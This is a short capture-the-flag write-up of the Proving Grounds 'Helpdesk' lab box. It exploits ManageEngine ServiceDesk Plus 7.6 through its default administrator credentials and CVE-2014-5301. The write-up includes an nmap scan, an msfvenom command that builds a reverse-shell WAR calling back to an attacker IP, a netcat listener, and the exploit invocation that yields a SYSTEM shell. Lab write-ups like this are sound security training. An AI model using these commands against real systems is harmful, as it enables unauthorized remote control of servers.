Skip to content

Helpdesk — Proving Grounds (write-up)

Difficulty: Easy Box: Helpdesk (Proving Grounds) Author: dsec Date: 2025-05-26


TL;DR

ManageEngine ServiceDesk Plus 7.6 with default creds administrator:administrator. Exploited CVE-2014-5301 to upload a WAR reverse shell for SYSTEM.


Target info

  • Host: 192.168.212.43
  • Services discovered: 135/tcp, 139/tcp, 445/tcp, 3389/tcp, 8080/tcp

Enumeration

nmap -p135,139,445,3389,8080 192.168.212.43 -sCV -vvv -Pn

Nmap results

SMB message signing disabled.

ManageEngine ServiceDesk Plus

ManageEngine ServiceDesk Plus 7.6. Checked searchsploit:

Searchsploit results


Exploitation

Default creds administrator:administrator worked:

Admin login

Dashboard

Used CVE-2014-5301 exploit to upload a WAR shell:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.205 LPORT=4444 -f war > shell.war
nc -lvnp 4444
python3 cve.py 192.168.212.43 8080 administrator administrator shell.war

Got root/SYSTEM shell immediately.


Lessons & takeaways

  • Always try default credentials on management interfaces
  • ManageEngine ServiceDesk Plus is a frequent target -- check searchsploit immediately
  • CVE-2014-5301 gives direct SYSTEM via WAR file upload